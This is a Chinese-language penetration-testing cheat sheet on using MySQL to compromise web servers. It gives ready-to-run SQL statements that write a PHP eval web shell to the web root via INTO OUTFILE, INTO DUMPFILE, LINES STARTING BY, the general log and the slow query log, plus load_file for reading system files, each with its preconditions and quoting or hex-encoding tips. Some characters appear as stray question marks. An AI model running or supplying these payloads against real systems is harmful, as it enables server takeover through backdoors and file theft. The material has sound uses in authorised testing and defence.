[大数据]渗透测试中MySQL的利用方式

目录

1、通过into outfile写shell

2、通过into dumpfile写shell

3、利用导出函数的补充参数写shell

?4、MySQL日志写shell

5、MySQL慢日志写shell

6、利用MySQL读取系统文件

简单记录MySQL的几种利用方式

1、通过into outfile写shell

条件：

（1）已知网站可访问路径的绝对路径

（2）数据库变量global secure_file_priv 的值非NULL或包含了网站可访问的绝对路径

（3）数据库服务有写文件权限，数据库用户有file_priv权限

（4）未对导出的路径的双引号进行转义

select '<?php @eval($_POST[rain]);?>' into outfile "C:\\phpStudy\\MySQL\\bin\\shell.php"; 

PS:

• outfile 的路径不能是0x开头或者char转换以后的路径，只能是引号包裹的路径

写shell时无法通过hex编码或char()来bypass引号转义。

• 文件不能覆盖写入，所以写入文件必须为不存在

2、通过into dumpfile写shell

条件：同上

select '<?php @eval($_POST[rain]);?>' into dumpfile "C:\\phpStudy\\MySQL\\bin\\shell.php"; 

PS：

• dumpfile 只能导出一行，在写?件时会保持?件的原?内容/原数据格式，适合写二进制文件
• dumpfile 的路径不能是0x开头或者char转换以后的路径，只能是引号包裹的路径写shell时无法通过hex编码或char()来bypass引号转义。
• 文件不能覆盖写入，所以写入文件必须为不存在

3、利用导出函数的补充参数写shell

条件：同上

select * from table_name into outfile "C:/phpStudy/MySQL/bin/shell.php" LINES STARTING BY '<?php @eval($_POST[rain]);?>';

类似的补充参数还有：

FIELDS TERMINATED BY ','    = 字段值之间以,分割
OPTIONALLY ENCLOSED BY '"'    = 字段值以"包裹
LINES TERMINATED BY '\n'    = 设置每?数据结尾的字符为换行符

?4、MySQL日志写shell

条件：

（1）已知网站可访问路径的绝对路径

（2）数据库已开启general_log模式，或者数据库启动用户有开启权限，能手动开启

（3）global general_log_file变量路径为已知网站可访问路径的绝对路径

select'<?php eval($_POST[rain]);?>'

5、MySQL慢日志写shell

条件：

（1）已知网站可访问路径的绝对路径

（2）global?slow_query_log设置为on，或数据库用户有开启慢查询日志（set global slow_query_log = 1;）的权限

（3）global slow_query_log_file的变量为已知网站可访问路径的绝对路径（手动设置时日志路径可以hex编码）

利用前查看超过多少时间会被记录慢查询日志(默认10s)：

SHOW GLOBAL VARIABLES LIKE 'long%';

select "<?php eval($_POST[rain]);?>" from table where sleep(12);

6、利用MySQL读取系统文件

条件：

（1）已知网站可访问路径的绝对路径

（2）数据库变量global secure_file_priv 的值非NULL或包含了网站可访问的绝对路径

（3）数据库服务有读文件权限，数据库用户有file_priv权限

select load_file('C:/phpStudy/WWW/test.txt');

读取的文件路径可以进行hex编码

参考资料来源于?FreeBuf.COM?